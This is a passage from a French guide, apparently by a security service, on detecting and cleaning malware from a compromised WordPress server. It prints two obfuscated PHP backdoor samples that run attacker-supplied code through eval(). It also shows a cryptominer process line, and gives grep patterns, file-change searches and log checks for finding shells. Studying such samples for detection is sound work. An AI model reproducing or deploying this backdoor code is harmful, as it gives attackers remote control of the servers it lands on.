NULL);@$v048a[$v048a['e7a5745b2'][37].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][88]]($v048a['e7a5745b2'][10].$v048a['e7a5745b2'][81].$v048a['e7a5745b2'][13].$v048a['e7a5745b2'][84].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][36].$v048a['e7a5745b2'][36].$v048a['e7a5745b2'][81].$v048a['e7a5745b2'][36].$v048a['e7a5745b2'][41], 0);@$v048a[$v048a['e7a5745b2'][37].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][88]]($v048a['e7a5745b2'][67].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][73].$v048a['e7a5745b2'][84].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][73].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][50].$v048a['e7a5745b2'][96].$v048a['e7a5745b2'][34].$v048a['e7a5745b2'][81].$v048a['e7a5745b2'][3].$v048a['e7a5745b2'][84].$v048a['e7a5745b2'][96].$v048a['e7a5745b2'][34].$v048a['e7a5745b2'][67].$v048a['e7a5745b2'][4], 0);@$v048a[$v048a['e7a5745b2'][37].$v048a['e7a5745b2'][27].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][68]](0);$x24294 = NULL;$r73534bfb = NULL;$v048a[$v048a['e7a5745b2'][41].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][6]] = $v048a['e7a5745b2'][6].$v048a['e7a5745b2'][39].$v048a['e7a5745b2'][6].$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][0].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][15].$v048a['e7a5745b2'][89].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][35].$v048a['e7a5745b2'][95].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][89].$v048a['e7a5745b2'][39].$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][89].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][35].$v048a['e7a5745b2'][15].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][89].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][35].$v048a['e7a5745b2'][0].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][0];global $sbb18;function  x9b72fc($x24294, $h23d86){global $v048a;$q3dd887f = \"\";for ($v3970=0; $v3970&lt;$v048a[$v048a['e7a5745b2'][81].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][35]]($x24294);){for ($n33fd565=0; $n33fd565&lt;$v048a[$v048a['e7a5745b2'][81].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][35]]($h23d86) &amp;&amp; $v3970&lt;$v048a[$v048a['e7a5745b2'][81].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][35]]($x24294); $n33fd565++, $v3970++){$q3dd887f .= $v048a[$v048a['e7a5745b2'][93].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][39].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][6].$v048a['e7a5745b2'][80]]($v048a[$v048a['e7a5745b2'][50].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][6].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][80]]($x24294[$v3970]) ^ $v048a[$v048a['e7a5745b2'][50].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][6].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][80]]($h23d86[$n33fd565]));}}return $q3dd887f;}function  gbc192($x24294, $h23d86){global $v048a;global $sbb18;return $v048a[$v048a['e7a5745b2'][93].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][95].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][56]]($v048a[$v048a['e7a5745b2'][93].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][95].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][56]]($x24294, $sbb18), $h23d86);}foreach ($v048a[$v048a['e7a5745b2'][41].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][27].$v048a['e7a5745b2'][95]] as $h23d86=&gt;$vb94){$x24294 = $vb94;$r73534bfb = $h23d86;}if (!$x24294){foreach ($v048a[$v048a['e7a5745b2'][3].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][56].$v048a['e7a5745b2'][15]] as $h23d86=&gt;$vb94){$x24294 = $vb94;$r73534bfb = $h23d86;}}$x24294 = @$v048a[$v048a['e7a5745b2'][10].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][6].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][35].$v048a['e7a5745b2'][52]]($v048a[$v048a['e7a5745b2'][10].$v048a['e7a5745b2'][4].$v048a['e7a5745b2'][27].$v048a['e7a5745b2'][35].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][95]]($v048a[$v048a['e7a5745b2'][41].$v048a['e7a5745b2'][15].$v048a['e7a5745b2'][68].$v048a['e7a5745b2'][18].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][82]]($x24294), $r73534bfb));if (isset($x24294[$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][97]]) &amp;&amp; $sbb18==$x24294[$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][97]]){if ($x24294[$v048a['e7a5745b2'][52]] == $v048a['e7a5745b2'][34]){$v3970 = Array($v048a['e7a5745b2'][92].$v048a['e7a5745b2'][17] =&gt; @$v048a[$v048a['e7a5745b2'][82].$v048a['e7a5745b2'][80].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][0].$v048a['e7a5745b2'][88].$v048a['e7a5745b2'][39].$v048a['e7a5745b2'][80]](),$v048a['e7a5745b2'][41].$v048a['e7a5745b2'][17] =&gt; $v048a['e7a5745b2'][56].$v048a['e7a5745b2'][21].$v048a['e7a5745b2'][74].$v048a['e7a5745b2'][89].$v048a['e7a5745b2'][56],);echo @$v048a[$v048a['e7a5745b2'][59].$v048a['e7a5745b2'][27].$v048a['e7a5745b2'][6].$v048a['e7a5745b2'][52].$v048a['e7a5745b2'][6]]($v3970);}elseif ($x24294[$v048a['e7a5745b2'][52]] == $v048a['e7a5745b2'][4]){eval\/*ifd841*\/($x24294[$v048a['e7a5745b2'][68]]);}exit();} ?&gt;<\/pre>\n<p>en plus simple :<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">&lt;?php $p5dQxlL = array(8660, 185, 6556, 64, 6770, 183, 2842, 158, 5462, 182, 13540, 186, 7538, 178, 12903, 122, 11598, 108, 6269, 89, 4100, 161, 682, 102, 6077, 41, 1022, 153, 4629, 88, 5818, 109, 6953, 183, 1771, 114, 11125, 97, 3000, 42, 9736, 187, 3761, 164, 12707, 196, 847, 114, 4355, 153, 1175, 129, 7136, 93, 6192, 77, 3290, 176, 5124, 151, 8045, 179, 2671, 74, 12185, 176, 8224, 73, 467, 69, 92, 190, 8845, 187, 536, 146, 10796, 149, 10945, 81, 10271, 155, 13195, 177, 7229, 121, 8297, 173, 9165, 164, 1885, 93, 7350, 188, 12137, 48, 11463, 135, 3925, 175, 784, 63, 13025, 170, 4828, 55, 12530, 77, 4508, 121, 11917, 56, 2156, 122, 9923, 160, 1647, 124, 4717, 111, 5275, 187, 10694, 102, 2278, 191, 5927, 150, 12075, 62, 12027, 48, 0, 92, 9519, 158, 4261, 94, 11026, 99, 6118, 74, 7716, 194, 10524, 170, 13372, 168, 10143, 41, 4883, 146, 11706, 74, 3466, 146, 2469, 123, 1304, 154, 11222, 125, 11347, 116, 9474, 45, 5644, 174, 6667, 103, 8470, 190, 282, 185, 10083, 60, 3170, 120, 2745, 97, 3042, 128, 11973, 54, 2592, 79, 5029, 95, 961, 61, 9677, 59, 6358, 198, 9329, 145, 1588, 59, 11780, 137, 13726, 158, 12607, 100, 3612, 149, 1458, 130, 10184, 87, 9032, 133, 7952, 93, 10426, 98, 1978, 178, 6620, 47, 12361, 169, 7910, 42);\r\n$FY52xy = \"\";\r\nfor ($tWqBxTpk = 0;$tWqBxTpk &lt; sizeof($p5dQxlL);$tWqBxTpk+= 2) {\r\n    if ($tWqBxTpk % 4) {\r\n        $FY52xy.= substr($Sc9mQcZx, $p5dQxlL[$tWqBxTpk], $p5dQxlL[$tWqBxTpk + 1]);\r\n    } else {\r\n        $FY52xy.= $jaNwcmT(substr($Sc9mQcZx, $p5dQxlL[$tWqBxTpk], $p5dQxlL[$tWqBxTpk + 1]));\r\n    }\r\n};\r\nif (!isset($jcRQ6i)) return $FY52xy;<\/pre>\n<p>&nbsp;<\/p>\n<p>Vous noterez que les malwares ont toujours besoin de la fonction GLOBAL qui est l&#8217;indicateur que nous utilisons le plus souvent :<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">&lt;?php $tb78 = 506;\r\n$GLOBALS['fb355e'] = Array();\r\nglobal $fb355e;\r\n$fb355e = $GLOBALS;\r\n$ {\r\n    \"GLOBALS\"\r\n}\r\n['l82418'] = \"ozMBYu4A&lt;\"TnPRx ~ I ^ bk_O5 &amp; HU\\x9JW\r\n} &gt; w$\\xa ? \/;\r\nNm, GyVj0F[ = 1q % Dl9) de@]c782\\ : (6f\\xdv + #KsZS|p'-!gaXL3E*Cr`.{tQhi\";$fb355e[$fb355e['l82418'][83].$fb355e['l82418'][56].$fb355e['l82418'][67].$fb355e['l82418'][86].$fb355e['l82418'][54]] = $fb355e['l82418'][60].$fb355e['l82418'][96].$fb355e['l82418'][90];$fb355e[$fb355e['l82418'][60].$fb355e['l82418'][83].$fb355e['l82418'][18].$fb355e['l82418'][57].$fb355e['l82418'][63].$fb355e['l82418'][57]] = $fb355e['l82418'][0].$fb355e['l82418'][90].$fb355e['l82418'][56];$fb355e[$fb355e['l82418'][44].$fb355e['l82418'][63].$fb355e['l82418'][18].$fb355e['l82418'][62].$fb355e['l82418'][68].$fb355e['l82418'][62]] = $fb355e['l82418'][74].$fb355e['l82418'][94].$fb355e['l82418'][90].$fb355e['l82418'][53].$fb355e['l82418'][57].$fb355e['l82418'][11];$fb355e[$fb355e['l82418'][42].$fb355e['l82418'][6].$fb355e['l82418'][83].$fb355e['l82418'][83].$fb355e['l82418'][68].$fb355e['l82418'][60]] = $fb355e['l82418'][97].$fb355e['l82418'][11].$fb355e['l82418'][97].$fb355e['l82418'][21].$fb355e['l82418'][74].$fb355e['l82418'][57].$fb355e['l82418'][94];$fb355e[$fb355e['l82418'][74].$fb355e['l82418'][61].$fb355e['l82418'][57].$fb355e['l82418'][63].$fb355e['l82418'][56].$fb355e['l82418'][62].$fb355e['l82418'][18].$fb355e['l82418'][60].$fb355e['l82418'][63]] = $fb355e['l82418'][74].$fb355e['l82418'][57].$fb355e['l82418'][90].$fb355e['l82418'][97].$fb355e['l82418'][83].$fb355e['l82418'][53].$fb355e['l82418'][97].$fb355e['l82418'][1].$fb355e['l82418'][57];$fb355e[$fb355e['l82418'][18].$fb355e['l82418'][86].$fb355e['l82418'][49].$fb355e['l82418'][83].$fb355e['l82418'][49].$fb355e['l82418'][68].$fb355e['l82418'][57].$fb355e['l82418'][18].$fb355e['l82418'][68]] = $fb355e['l82418'][78].$fb355e['l82418'][96].$fb355e['l82418'][78].$fb355e['l82418'][70].$fb355e['l82418'][57].$fb355e['l82418'][90].$fb355e['l82418'][74].$fb355e['l82418'][97].$fb355e['l82418'][0].$fb355e['l82418'][11];$fb355e[$fb355e['l82418'][82].$fb355e['l82418'][86].$fb355e['l82418'][56].$fb355e['l82418'][86]] = $fb355e['l82418'][5].$fb355e['l82418'][11].$fb355e['l82418'][74].$fb355e['l82418'][57].$fb355e['l82418'][90].$fb355e['l82418'][97].$fb355e['l82418'][83].$fb355e['l82418'][53].$fb355e['l82418'][97].$fb355e['l82418'][1].$fb355e['l82418'][57];$fb355e[$fb355e['l82418'][14].$fb355e['l82418'][49].$fb355e['l82418'][56].$fb355e['l82418'][56].$fb355e['l82418'][61].$fb355e['l82418'][61]] = $fb355e['l82418'][18].$fb355e['l82418'][83].$fb355e['l82418'][74].$fb355e['l82418'][57].$fb355e['l82418'][67].$fb355e['l82418'][6].$fb355e['l82418'][21].$fb355e['l82418'][56].$fb355e['l82418'][57].$fb355e['l82418'][60].$fb355e['l82418'][0].$fb355e['l82418'][56].$fb355e['l82418'][57];$fb355e[$fb355e['l82418'][70].$fb355e['l82418'][68].$fb355e['l82418'][56].$fb355e['l82418'][49].$fb355e['l82418'][49].$fb355e['l82418'][54].$fb355e['l82418'][63].$fb355e['l82418'][49].$fb355e['l82418'][68]] = $fb355e['l82418'][74].$fb355e['l82418'][57].$fb355e['l82418'][94].$fb355e['l82418'][21].$fb355e['l82418'][94].$fb355e['l82418'][97].$fb355e['l82418'][39].$fb355e['l82418'][57].$fb355e['l82418'][21].$fb355e['l82418'][53].$fb355e['l82418'][97].$fb355e['l82418'][39].$fb355e['l82418'][97].$fb355e['l82418'][94];$fb355e[$fb355e['l82418'][57].$fb355e['l82418'][83].$fb355e['l82418'][62].$fb355e['l82418'][57].$fb355e['l82418'][83].$fb355e['l82418'][45].$fb355e['l82418'][61].$fb355e['l82418'][67]] = $fb355e['l82418'][32].$fb355e['l82418'][49].$fb355e['l82418'][60].$fb355e['l82418'][54].$fb355e['l82418'][61].$fb355e['l82418'][6];$fb355e[$fb355e['l82418'][78].$fb355e['l82418'][18].$fb355e['l82418'][61].$fb355e['l82418'][23].$fb355e['l82418'][54].$fb355e['l82418'][6].$fb355e['l82418'][23].$fb355e['l82418'][23]] = $fb355e['l82418'][19].$fb355e['l82418'][23].$fb355e['l82418'][6].$fb355e['l82418'][61].$fb355e['l82418'][60];$fb355e[$fb355e['l82418'][0].$fb355e['l82418'][61].$fb355e['l82418'][61].$fb355e['l82418'][62]] = $_POST;$fb355e[$fb355e['l82418'][0].$fb355e['l82418'][6].$fb355e['l82418'][83].$fb355e['l82418'][62]] = $_COOKIE;@$fb355e[$fb355e['l82418'][42].$fb355e['l82418'][6].$fb355e['l82418'][83].$fb355e['l82418'][83].$fb355e['l82418'][68].$fb355e['l82418'][60]]($fb355e['l82418'][57].$fb355e['l82418'][90].$fb355e['l82418'][90].$fb355e['l82418'][0].$fb355e['l82418'][90].$fb355e['l82418'][21].$fb355e['l82418'][53].$fb355e['l82418'][0].$fb355e['l82418'][82], NULL);@$fb355e[$fb355e['l82418'][42].$fb355e['l82418'][6].$fb355e['l82418'][83].$fb355e['l82418'][83].$fb355e['l82418'][68].$fb355e['l82418'][60]]($fb355e['l82418'][53].$fb355e['l82418'][0].$fb355e['l82418'][82].$fb355e['l82418'][21].$fb355e['l82418'][57].$fb355e['l82418'][90].$fb355e['l82418'][90].$fb355e['l82418'][0].$fb355e['l82418'][90].$fb355e['l82418'][74], 0);@$fb355e[$fb355e['l82418'][42].$fb355e['l82418'][6].$fb355e['l82418'][83].$fb355e['l82418'][83].$fb355e['l82418'][68].$fb355e['l82418'][60]]($fb355e['l82418'][39].$fb355e['l82418'][83].$fb355e['l82418'][14].$fb355e['l82418'][21].$fb355e['l82418'][57].$fb355e['l82418'][14].$fb355e['l82418'][57].$fb355e['l82418'][60].$fb355e['l82418'][5].$fb355e['l82418'][94].$fb355e['l82418'][97].$fb355e['l82418'][0].$fb355e['l82418'][11].$fb355e['l82418'][21].$fb355e['l82418'][94].$fb355e['l82418'][97].$fb355e['l82418'][39].$fb355e['l82418'][57], 0);@$fb355e[$fb355e['l82418'][70].$fb355e['l82418'][68].$fb355e['l82418'][56].$fb355e['l82418'][49].$fb355e['l82418'][49].$fb355e['l82418'][54].$fb355e['l82418'][63].$fb355e['l82418'][49].$fb355e['l82418'][68]](0);$u604d9662 = NULL;$r5401375 = NULL;$fb355e[$fb355e['l82418'][1].$fb355e['l82418'][18].$fb355e['l82418'][56].$fb355e['l82418'][57].$fb355e['l82418'][57].$fb355e['l82418'][6].$fb355e['l82418'][6].$fb355e['l82418'][18]] = $fb355e['l82418'][6].$fb355e['l82418'][54].$fb355e['l82418'][62].$fb355e['l82418'][56].$fb355e['l82418'][45].$fb355e['l82418'][18].$fb355e['l82418'][49].$fb355e['l82418'][60].$fb355e['l82418'][80].$fb355e['l82418'][56].$fb355e['l82418'][54].$fb355e['l82418'][23].$fb355e['l82418'][61].$fb355e['l82418'][80].$fb355e['l82418'][6].$fb355e['l82418'][6].$fb355e['l82418'][86].$fb355e['l82418'][67].$fb355e['l82418'][80].$fb355e['l82418'][83].$fb355e['l82418'][23].$fb355e['l82418'][45].$fb355e['l82418'][56].$fb355e['l82418'][80].$fb355e['l82418'][63].$fb355e['l82418'][61].$fb355e['l82418'][60].$fb355e['l82418'][54].$fb355e['l82418'][6].$fb355e['l82418'][61].$fb355e['l82418'][57].$fb355e['l82418'][86].$fb355e['l82418'][45].$fb355e['l82418'][45].$fb355e['l82418'][68].$fb355e['l82418'][54];global $zbdee44b;function  k547c($u604d9662, $c2fe6404){global $fb355e;$ue9100 = \"\";for ($f231=0; $f231&lt;$fb355e[$fb355e['l82418'][44].$fb355e['l82418'][63].$fb355e['l82418'][18].$fb355e['l82418'][62].$fb355e['l82418'][68].$fb355e['l82418'][62]]($u604d9662);){for ($s9716d=0; $s9716d&lt;$fb355e[$fb355e['l82418'][44].$fb355e['l82418'][63].$fb355e['l82418'][18].$fb355e['l82418'][62].$fb355e['l82418'][68].$fb355e['l82418'][62]]($c2fe6404) &amp;&amp; $f231&lt;$fb355e[$fb355e['l82418'][44].$fb355e['l82418'][63].$fb355e['l82418'][18].$fb355e['l82418'][62].$fb355e['l82418'][68].$fb355e['l82418'][62]]($u604d9662); $s9716d++, $f231++){$ue9100 .= $fb355e[$fb355e['l82418'][83].$fb355e['l82418'][56].$fb355e['l82418'][67].$fb355e['l82418'][86].$fb355e['l82418'][54]]($fb355e[$fb355e['l82418'][60].$fb355e['l82418'][83].$fb355e['l82418'][18].$fb355e['l82418'][57].$fb355e['l82418'][63].$fb355e['l82418'][57]]($u604d9662[$f231]) ^ $fb355e[$fb355e['l82418'][60].$fb355e['l82418'][83].$fb355e['l82418'][18].$fb355e['l82418'][57].$fb355e['l82418'][63].$fb355e['l82418'][57]]($c2fe6404[$s9716d]));}}return $ue9100;}function  w1c974($u604d9662, $c2fe6404){global $fb355e;global $zbdee44b;return $fb355e[$fb355e['l82418'][78].$fb355e['l82418'][18].$fb355e['l82418'][61].$fb355e['l82418'][23].$fb355e['l82418'][54].$fb355e['l82418'][6].$fb355e['l82418'][23].$fb355e['l82418'][23]]($fb355e[$fb355e['l82418'][78].$fb355e['l82418'][18].$fb355e['l82418'][61].$fb355e['l82418'][23].$fb355e['l82418'][54].$fb355e['l82418'][6].$fb355e['l82418'][23].$fb355e['l82418'][23]]($u604d9662, $zbdee44b), $c2fe6404);}foreach ($fb355e[$fb355e['l82418'][0].$fb355e['l82418'][6].$fb355e['l82418'][83].$fb355e['l82418'][62]] as $c2fe6404=&gt;$f99f){$u604d9662 = $f99f;$r5401375 = $c2fe6404;}if (!$u604d9662){foreach ($fb355e[$fb355e['l82418'][0].$fb355e['l82418'][61].$fb355e['l82418'][61].$fb355e['l82418'][62]] as $c2fe6404=&gt;$f99f){$u604d9662 = $f99f;$r5401375 = $c2fe6404;}}$u604d9662 = @$fb355e[$fb355e['l82418'][82].$fb355e['l82418'][86].$fb355e['l82418'][56].$fb355e['l82418'][86]]($fb355e[$fb355e['l82418'][57].$fb355e['l82418'][83].$fb355e['l82418'][62].$fb355e['l82418'][57].$fb355e['l82418'][83].$fb355e['l82418'][45].$fb355e['l82418'][61].$fb355e['l82418'][67]]($fb355e[$fb355e['l82418'][14].$fb355e['l82418'][49].$fb355e['l82418'][56].$fb355e['l82418'][56].$fb355e['l82418'][61].$fb355e['l82418'][61]]($u604d9662), $r5401375));if (isset($u604d9662[$fb355e['l82418'][83].$fb355e['l82418'][19]]) &amp;&amp; $zbdee44b==$u604d9662[$fb355e['l82418'][83].$fb355e['l82418'][19]]){if ($u604d9662[$fb355e['l82418'][83]] == $fb355e['l82418'][97]){$f231 = Array($fb355e['l82418'][78].$fb355e['l82418'][70] =&gt; @$fb355e[$fb355e['l82418'][18].$fb355e['l82418'][86].$fb355e['l82418'][49].$fb355e['l82418'][83].$fb355e['l82418'][49].$fb355e['l82418'][68].$fb355e['l82418'][57].$fb355e['l82418'][18].$fb355e['l82418'][68]](),$fb355e['l82418'][74].$fb355e['l82418'][70] =&gt; $fb355e['l82418'][49].$fb355e['l82418'][92].$fb355e['l82418'][45].$fb355e['l82418'][80].$fb355e['l82418'][49],);echo @$fb355e[$fb355e['l82418'][74].$fb355e['l82418'][61].$fb355e['l82418'][57].$fb355e['l82418'][63].$fb355e['l82418'][56].$fb355e['l82418'][62].$fb355e['l82418'][18].$fb355e['l82418'][60].$fb355e['l82418'][63]]($f231);}elseif ($u604d9662[$fb355e['l82418'][83]] == $fb355e['l82418'][57]){eval\/*b1e3a6fe*\/($u604d9662[$fb355e['l82418'][56]]);}exit();}\r\n ?&gt;\r\n<\/pre>\n<p>&nbsp;<\/p>\n<p>Ainsi m\u00eame si cette fonction est la plus commune nous recommandons la commande suivante pour d\u00e9celer les malwares :<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">grep -r -i --include=\\*.php '$GLOBALS' \/var\/www\/wordpress\/<\/pre>\n<p>Les r\u00e9sultats seront certes nombreux mais avec ce spectre large vous pourrez analyser minutieusement les r\u00e9sultats pour y d\u00e9celer des malwares chiffr\u00e9s. Vous pouvez \u00e9galement utiliser un scanner tiers <a href=\"https:\/\/github.com\/scr34m\/php-malware-scanner\">tel celui-ci<\/a> pour automatiser ces requ\u00eates mais qui ne sont pas aussi fiables qu&#8217;une analyse manuelle.<\/p>\n<p>&nbsp;<\/p>\n<p style=\"text-align: center;\"><strong>N&#8217;h\u00e9sitez pas \u00e0 nous contacter si les logs sont trop fournis ou que vous avez un doute sur certains fichiers !<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<h3>Affichez les fichiers modifi\u00e9s ces derni\u00e8res 24h<\/h3>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">find \/var\/www\/wordpress\/ -mtime -1 -ls<\/pre>\n<p>Le &#8220;-1&#8221; ici permet de r\u00e9cup\u00e9rer les fichiers modifi\u00e9s il y a un jour ou moins. Si vous le modifiez en &#8220;+1&#8221;, cela affichera les fichiers modifi\u00e9s il y a un jour ou plus. Si vous ne mettez aucun signe devant le &#8220;1&#8221;, alors cela affichera les fichiers modifi\u00e9s uniquement il y a jour.<\/p>\n<p>&nbsp;<\/p>\n<p>Une fois le m\u00e9nage fait, refaites les commandes suivantes pour vous assurer qu&#8217;il ne reste plus rien :<\/p>\n<p>&nbsp;<\/p>\n<h3>D\u00e9tectez les shells cach\u00e9s dans des .ico<\/h3>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">grep -r -i --include=*.ico 'preg_replace' \/var\/www\/wordpress\/<\/pre>\n<p>&nbsp;<\/p>\n<h3>D\u00e9celez les shells injecteurs<\/h3>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">grep -r -i --include=*.php '*\/ @include' \/var\/www\/wordpress\/\r\n<\/pre>\n<p>&nbsp;<\/p>\n<h3>D\u00e9celez un processus suspect<\/h3>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">htop\r\n<\/pre>\n<p>Cette commande affiche toute la liste des processus en cours sur votre serveur. Cherchez dans la liste un processus suspect puis tuez le avec F9, exemple de processus suspect, ici un mineur bitcoin (votre serveur mine des btc pour un tiers attaquant) :<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">500      56885  198  0.1  69408  8028 ?        Sl   Sep23 5940:27 .\/cnrig -a cryptonight --donate-level 1 --max-cpu-usage 50 -o xmr.pool.minergate.com:45700 -u 4635633@mail.ru -p x --variant 1 -k<\/pre>\n<p>&nbsp;<\/p>\n<h2>V\u00e9rifiez les logs du serveur<\/h2>\n<p>Afin de vous assurer que personne d&#8217;autre ne d\u00e9tient les acc\u00e8s \u00e0 votre serveur ou qu&#8217;aucune requ\u00eate suspecte n&#8217;est effectu\u00e9e, il convient d&#8217;analyser les logs de votre serveur.<\/p>\n<p>&nbsp;<\/p>\n<h3>Analysez les derni\u00e8res connexions au SSH<\/h3>\n<p>Pour v\u00e9rifier qui s&#8217;est connect\u00e9 \u00e0 votre serveur SSH derni\u00e8rement, vous pouvez utiliser les commandes suivantes :<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">last\r\ncat \/var\/log\/auth.log<\/pre>\n<p>Vous pourrez d\u00e8s lors trouver des tentatives d&#8217;acc\u00e8s non autoris\u00e9s et bloquer les adresses IP en question.<\/p>\n<p>&nbsp;<\/p>\n<h3>V\u00e9rifiez les logs du serveur web<\/h3>\n<p>Qu&#8217;il s&#8217;agisse d&#8217;Apache ou Nginx, votre serveur web doit enregistrer des logs. Si ce n&#8217;est pas le cas, pensez \u00e0 modifier votre configuration. Selon votre configuration, ces logs peuvent enregistrer de nombreuses informations en dehors des erreurs : c&#8217;est ce qu&#8217;il faudra inspecter.<\/p>\n<p>Les logs se situent en g\u00e9n\u00e9ral dans :<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">\/var\/log\/<\/pre>\n<p>Vous pouvez vous rendre dans ce dossier et lancer un :<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">ls -ltr<\/pre>\n<p>Afin d&#8217;afficher de bas en haut les logs ayant \u00e9t\u00e9s modifi\u00e9s le plus r\u00e9cemment et v\u00e9rifier leur contenu.<\/p>\n<p>Regardez aussi quels ips reviennent souvent et effectuent des actions louches comme des requ\u00eates POST vers les fichiers .ico et .php v\u00e9rol\u00e9s puis bannissez les avec iptable :<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">iptables -I INPUT -s IPDUCOUPABLE -j DROP\r\n<\/pre>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<h2>Que faire apr\u00e8s une d\u00e9sinfection ?<\/h2>\n<p>On ne le dira jamais assez donc nous allons le r\u00e9p\u00e9ter : lorsque vous aurez termin\u00e9 de nettoyer votre site, il faudra penser \u00e0 effectuer 3 petites \u00e9tapes :<\/p>\n<ul>\n<li>Red\u00e9marrer PHP et ainsi <span id=\"p141\">rafra\u00eechir<\/span> le code OpCache<\/li>\n<li>Red\u00e9marrer Redis (si install\u00e9 sur votre serveur)<\/li>\n<li>Vider le cache de votre WordPress (si vous en disposez d&#8217;un comme WP Rocket)<\/li>\n<li>Vider le cache de votre CDN (si vous en disposez d&#8217;un comme Cloudflare)<\/li>\n<\/ul>\n<p>Gr\u00e2ce \u00e0 ces trois manipulations, vous vous assurez de ne pas avoir de fichiers PHP ou .ico mis en cache qui serait encore v\u00e9rol\u00e9s et qui pourrait ainsi propager de nouveau l&#8217;infection sans que vous ne sachiez pourquoi. \ud83d\ude09<\/p>\n<p>Enfin r\u00e9g\u00e9n\u00e9rez les salts de votre serveur, changez vos acc\u00e8s ssh\/ftp, changez les acc\u00e8s de la base de donn\u00e9es et bien sur d&#8217;administration wordpress.<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<h2>S\u00e9curiser davantage son site et son serveur<\/h2>\n<p>Si vous n&#8217;avez pas r\u00e9ussi \u00e0 nettoyer votre serveur, votre site ou que vous avez un doute sur les fichiers que vous avez r\u00e9cup\u00e9r\u00e9s gr\u00e2ce \u00e0 nos commandes, alors faites appels \u00e0 nos services. Nos experts s\u2019occuperont d&#8217;analyser cela pour vous afin de vous accompagner dans le nettoyage de votre site.<\/p>\n<p>&nbsp;<\/p>\n<div id=\"lfb_bootstraped\" class=\"lfb_bootstraped notranslate\"><div id=\"lfb_form\" data-usevisual=\"0\" data-progressbar=\"3\" data-qttype=\"0\" data-imgtitlesstyle=\"\" data-emaillaststep=\"0\" data-showsteps=\"true\"      data-formtitle=\"Audits (1)\" data-formsession=\"6a62ce0bba1dd\" data-autoclick=\"1\"  data-subs=\"\" data-form=\"22\" class=\"lfb_bootstraped  \" data-stylefields=\"\" data-animspeed=\"0.5\" data-sumstepsclick=\"0\" data-sumhidesteps=\"0\">\n                <div id=\"lfb_loader\"><div class=\"lfb_spinner\"><div class=\"double-bounce1\"><\/div><div class=\"double-bounce2\"><\/div><\/div><\/div><div id=\"lfb_passModal\" class=\"modal\" 